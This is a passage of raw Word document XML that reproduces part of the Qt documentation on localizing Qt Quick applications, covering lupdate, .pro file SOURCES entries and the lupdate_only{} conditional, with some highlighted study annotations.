          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="00B90C6B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1149" w:name="localizing-your-application"/>
      <w:bookmarkStart w:id="1150" w:name="_Toc483000774"/>
      <w:bookmarkStart w:id="1151" w:name="_Toc483003772"/>
      <w:bookmarkStart w:id="1152" w:name="_Toc483604126"/>
      <w:bookmarkStart w:id="1153" w:name="_Toc483605346"/>
      <w:bookmarkEnd w:id="1149"/>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Localizing Your Application</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1150"/>
      <w:bookmarkEnd w:id="1151"/>
      <w:bookmarkEnd w:id="1152"/>
      <w:bookmarkEnd w:id="1153"/>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217C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick applications use the same underlying localization system as Qt C++ applications (lupdate, lrelease and .ts files)</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. You use the same tools as described in the</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId684" w:history="1">
        <w:r w:rsidRPr="00217C35">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Linguist Manual</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. You can even </w:t>
      </w:r>
      <w:r w:rsidRPr="00217C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">have user interface strings in C++ and QML </w:t>
      </w:r>
      <w:r w:rsidRPr="00217C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>source in the same application</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The system will create a single combined translation file and the strings are accessible from QML and C++.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="00B90C6B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1154" w:name="use-a-conditional-to-hide-qml-source-fro"/>
      <w:bookmarkStart w:id="1155" w:name="_Toc483000775"/>
      <w:bookmarkStart w:id="1156" w:name="_Toc483003773"/>
      <w:bookmarkStart w:id="1157" w:name="_Toc483604127"/>
      <w:bookmarkStart w:id="1158" w:name="_Toc483605347"/>
      <w:bookmarkEnd w:id="1154"/>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use a Conditional to Hide QML Source From the Compiler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1155"/>
      <w:bookmarkEnd w:id="1156"/>
      <w:bookmarkEnd w:id="1157"/>
      <w:bookmarkEnd w:id="1158"/>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EA496B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA496B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA496B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lupdate</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA496B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA496B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tool extracts user interface strings from your application</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. lupdate </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA496B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reads your application's .pro file to identify which source files contain texts to be translated</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This means your </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>source files must be listed in the</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOURCES</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HEADERS</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>entry in the .pro file</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. If your files are not listed the texts in them will not be found.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="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However, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA496B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOURCES</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> variable is intended for C++ source files. If you list QML or JavaScript source files there, the compiler tries to build them as though they are C++ files. As a workaround, you can use an</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA496B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lupdate_only{...}</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>conditional statement so the</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lupdate</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tool sees the .qml files but the C++ compiler ignores them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="36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For </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA496B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the following .pro file snippet specifies two .qml files in the application.</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lupdate_only</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SOURCES </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 xml:space="preserve"> main</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qml \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="00B16AAB"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w:t>
      </w:r>
      <w:r w:rsidRPr="00B16AAB">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MainPage</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16AAB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16AAB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA496B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can also specify the .qml source files with a wildcard match</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The search is not recursive so you need to specify each directory where there are user interface strings in the source code:</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lupdate_only</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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SOURCES </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qml \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">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w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*.</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>js \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">          content</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/*.qml \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">          content/*.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="00AA4573" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>See the</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId685" w:history="1">
        <w:r w:rsidRPr="005211D0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Linguist Manual</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more details about Qt localization.</w:t>
      </w:r>
      <w:r w:rsidR="00AA4573">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA4573" w:rsidRPr="00AA4573">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRDefault="005A6BBD" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DF758D" w:rsidRDefault="00490E7E" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId686" w:history="1">
        <w:r w:rsidR="00DF758D" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
